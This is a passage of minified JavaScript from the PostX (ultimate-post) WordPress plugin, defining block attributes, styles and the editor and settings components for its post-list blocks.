}"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n                    {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,\n                    {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n                    {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}} }"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n                    {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n                    {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n                    {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"queryNumber",default:6},{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:" "},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaMargin",default:{lg:{top:"",bottom:"20",left:"",right:"",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"catSacing",default:{lg:{bottom:5,unit:"px"},unit:"px"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"readMore",default:!0},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreSacing",default:{lg:{top:25,bottom:"",left:"",right:"",unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},48844:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(64173),r=l(36682),s=l(20629);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-1/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-1.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist1.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-1","listBlocks")]},edit:n.Z,save:()=>null})},42510:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(17285);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useRef:E,useState:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),{setAttributes:l,name:M,clientId:A,attributes:H,context:N,isSelected:j,className:Z,attributes:{blockId:O,currentPostId:R,readMoreIcon:D,imgCrop:z,imgCropSmall:F,excerptLimit:W,showFullExcerpt:V,showSmallMeta:G,metaStyle:q,metaShow:$,catShow:K,showImage:J,metaSeparator:Y,titleShow:X,catStyle:Q,catPosition:ee,titlePosition:te,excerptShow:le,imgAnimation:oe,imgOverlayType:ae,imgOverlay:ie,metaList:ne,metaListSmall:re,showSmallCat:se,readMore:pe,readMoreText:ce,showSmallBtn:ue,showSmallExcerpt:de,varticalAlign:me,imgFlip:ge,metaPosition:ye,layout:be,customCatColor:ve,onlyCatColor:he,contentTag:fe,titleTag:ke,showSeoMeta:we,titleLength:xe,metaMinText:Te,metaAuthorPrefix:_e,titleStyle:Ce,metaDateFormat:Ee,authorLink:Se,fallbackEnable:Pe,vidIconEnable:Le,notFoundMessage:Ie,excerptLimitLg:Be,fullExcerptLg:Ue,dcEnabled:Me,dcFields:Ae,previewImg:He,advanceId:Ne,paginationShow:je,paginationAjax:Ze,headingShow:Oe,filterShow:Re,paginationType:De,navPosition:ze,paginationNav:Fe,loadMoreText:We,paginationText:Ve,V4_1_0_CompCheck:{runComp:Ge}}}=e,[qe,$e]=S(w.Ti),[Ke,Je]=S(null);function Ye(e){$e({...qe,selectedDC:e})}function Xe(){$e({...qe,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Qe(e){$e({...qe,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),Je("setting")}function et(e){$e((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function tt(){qe.error&&$e({...qe,error:!1}),qe.loading||$e({...qe,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(H)}).then((e=>{$e({...qe,postsList:e,loading:!1})})).catch((e=>{$e({...qe,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),tt()}),[]),C((()=>{const t=A.substr(0,6),o=B(U(A));(0,a.qi)(l,o,R,A),(0,v.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[A]),C((()=>{const e=t.current;(0,h.o6)()&&0===H.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,H)&&(tt(),t.current=H),e.isSelected!==j&&j&&(0,w.gT)(Qe,et)):t.current=H}),[H]);const lt={settingTab:Ke,setSettingTab:Je,setAttributes:l,name:M,attributes:H,setSection:Qe,section:qe.section,clientId:A,context:N,setSelectedDc:Ye,selectedDC:qe.selectedDC,selectParentMetaGroup:function(e){Ye(e),et("dc_group")}};let ot;if(O&&(ot=(0,y.Kh)(H,"ultimate-post/post-list-2",O,(0,a.k0)())),He&&!j)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:He});C((()=>{j&&He&&l({previewImg:""})}),[e?.isSelected]);const at=_({...Ne&&{id:Ne},className:`ultp-block-${O} ${Z}`,onClick:e=>{e.stopPropagation(),Qe("general"),et("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:lt,selected:qe.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:lt})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"layout",block:"post-list-2",key:"layout",options:[{img:"assets/img/layouts/pl2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}]},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[Ge?"exclude":"dep"]:a.N2}],store:lt}),(0,o.createElement)("div",at,ot&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ot}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Oe||Re||je)&&(0,o.createElement)(r.m,{attributes:H,setAttributes:l,onClick:()=>{Qe("heading"),et("heading")},setSection:Qe,setToolbarSettings:et}),function(){const e=`${fe}`,t=(e,t)=>(0,h.o6)()&&Me&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Ae,settingsOnClick:(e,t)=>{e?.stopPropagation(),et(t)},selectedDC:qe.selectedDC,setSelectedDc:Ye,setAttributes:l,dcFields:Ae});return qe.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):qe.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):qe.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-content-${me} ultp-block-content-${ge} ultp-${be}`},qe.postsList.map(((a,r)=>{const p=0==r?JSON.parse(ne.replaceAll("u0022",'"')):JSON.parse(re.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:r,className:`ultp-block-item ultp-block-media post-id-${a.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap "+(0===r?"ultp-first-postlist-2":"ultp-all-postlist-2")},0===r&&t(8,a.ID),(a.image&&!a.is_fallback||Pe)&&J&&(0==r||0!=r&&"layout1"===be||"layout4"===be)&&(0,o.createElement)(s.A8,{imgOverlay:ie,imgOverlayType:ae,imgAnimation:oe,post:a,fallbackEnable:Pe,vidIconEnable:Le,imgCropSmall:F,showImage:J,imgCrop:z,idx:r,Category:0!=r&&!se||"aboveTitle"==ee?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:a,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ve,onlyCatColor:he,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}})),Video:Le&&a.has_video?(0,o.createElement)(s.nk,{onClick:()=>{Qe("video"),et("video")}}):null,onClick:()=>{Qe("image"),et("image")}}),(0,o.createElement)("div",{className:"ultp-block-content"},0!==r&&t(8,a.ID),t(7,a.ID),"aboveTitle"==ee&&(0==r||se)&&(0,o.createElement)(i.Z,{post:a,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ve,onlyCatColor:he,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}}),t(6,a.ID),a.title&&X&&1==te&&(0,o.createElement)(g.Z,{title:a.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Qe("title"),et("title")}}),t(5,a.ID),(0==r||G)&&$&&"top"==ye&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:Y,metaStyle:q,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Qe("meta"),et("meta")}}),t(4,a.ID),a.title&&X&&0==te&&(0,o.createElement)(g.Z,{title:a.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Qe("title"),et("title")}}),t(3,a.ID),(0==r||de)&&le&&(0,o.createElement)(n.Z,{excerpt:a.excerpt,excerpt_full:a.excerpt_full,seo_meta:a.seo_meta,excerptLimit:W,showFullExcerpt:V,showSeoMeta:we,onClick:e=>{Qe("excerpt"),et("excerpt")}}),t(2,a.ID),(0==r||ue)&&pe&&(0,o.createElement)(m.Z,{readMoreText:ce,readMoreIcon:D,titleLabel:a.title,onClick:()=>{Qe("read-more"),et("read-more")}}),t(1,a.ID),(0==r||G)&&$&&"bottom"==ye&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:Y,metaStyle:q,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Qe("meta"),et("meta")}}),t(0,a.ID),(0,h.o6)()&&Me&&(0,o.createElement)(f.Z,{dcFields:Ae,setAttributes:l,startOnboarding:Xe}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ie})}(),je&&"loadMore"==De&&(0,o.createElement)(p.Z,{loadMoreText:We,onClick:e=>{Qe("pagination"),et("pagination")}}),je&&"navigation"==De&&"topRight"!=ze&&(0,o.createElement)(u.Z,{onClick:()=>{Qe("pagination"),et("pagination")}}),je&&"pagination"==De&&(0,o.createElement)(d.Z,{paginationNav:Fe,paginationAjax:Ze,paginationText:Ve,onClick:e=>{Qe("pagination"),et("pagination")}}))))}},17285:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=9,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,setSettingTab:v,settingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6837",store:t}),(0,o.createElement)(p.Sections,{settingTab:h,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:!0,exclude:["columns","columnGridGap"],dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-list-2",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}],variation:{layout1:{counterColor:"#767676"},layout2:{counterColor:"#767676"},layout3:{counterColor:"var(--postx_preset_Base_2_color)"},layout4:{counterColor:"var(--postx_preset_Base_2_color)"}}}},{position:3,data:{type:"range",key:"septSpace",min:0,max:80,step:1,responsive:!0,label:__("Spacing","ultimate-post")}},{position:4,data:{type:"toggle",key:"imgFlip",label:__("Image Flip","ultimate-post")}},{position:5,data:{type:"toggle",key:"mobileImageTop",label:__("Stack on Mobile","ultimate-post")}},{position:6,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{position:8,data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["titleBackground"],hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,include:[{position:5,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:1,data:{type:"range",key:"largeimgSpacing",label:__("Large Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:2,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:3,data:{type:"range",key:"spaceLargeItem",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Large Item Space","ultimate-post")}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[6]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:b.meta,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:4,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:5,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}}],hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),("layout3"===l||"layout4"===l)&&(0,o.createElement)(a.wT,{store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t,exclude:["septSpace"]}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow"}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:t}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],include:[{position:7,data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:4,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:5,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read 